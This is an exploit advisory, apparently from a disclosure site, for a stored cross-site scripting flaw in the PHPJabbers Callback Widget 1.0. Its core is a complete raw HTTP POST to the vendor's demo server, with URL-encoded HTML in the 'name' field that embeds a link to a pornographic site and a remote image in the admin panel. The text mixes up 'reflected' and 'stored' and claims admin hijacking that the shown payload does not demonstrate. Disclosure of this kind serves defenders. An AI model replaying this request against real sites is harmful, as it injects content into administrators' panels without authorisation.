PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking

2024.01.26
bg nu11secur1ty (BG) bg
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: PHPJ-Callback-Widget-1.0-XSS-Stored-admin-Hijacking ## Author: nu11secur1ty ## Date: 01/26/2024 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/callback-widget/ ## Reference: https://portswigger.net/web-security/cross-site-scripting ## Description: The Callback Requests function is vulnerable to javascript injection. The malicious user from everywhere can send an XSS-Reflected exploit code to the admin panel, and then when the admin visits the API Callback Requests function he will immediately activate the exploitation of the malicious actor. This is so fun, thanks for watching the PoC video. =) BR STATUS: HIGH-Vulnerability [+]Exploit: ```POST POST /1706261102_419/index.php?controller=pjFront&action=pjActionSave HTTP/1.1 Host: demo.phpjabbers.com Cookie: _ga=GA1.2.2069938240.1692907228; _fbp=fb.1.1705479327501.84379277; _ga_NME5VTTGTT=GS1.2.1705493664.10.1.1705493702.22.0.0; CallbackWidget=irnrkmih5bc4ehc7fcgbc8ql84 Content-Length: 322 Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://demo.phpjabbers.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://demo.phpjabbers.com/1706261102_419/preview.php?theme=theme1 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Priority: u=1, i Connection: close reason_id=2&name=%3Ca+href%3D%22https%3A%2F%2Fwww.pornhub.com%22+target%3D%22_blank%22%3E+%09%3Cimg+src%3D%22https%3A%2F%2Fel.phncdn.com%2Fgif%2F45467111.gif%22+alt%3D%22STUPID%22width%3D%22900%22+height%3D%22450%22%3E+%3C%2Fa%3E&email=hack%40hack.com&phone=1234567890&besttime=30-01-2024+11%3A30&timezone=0&captcha=VIXFWL ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Callback-Widget-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/01/phpj-callback-widget-10-xss-reflected.html) ## Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top